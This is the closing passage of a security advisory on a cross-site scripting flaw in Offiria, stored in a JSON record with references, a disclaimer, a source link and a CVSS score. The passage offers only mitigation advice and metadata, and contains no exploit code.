temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria. \n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization. \n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126530/offiria-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
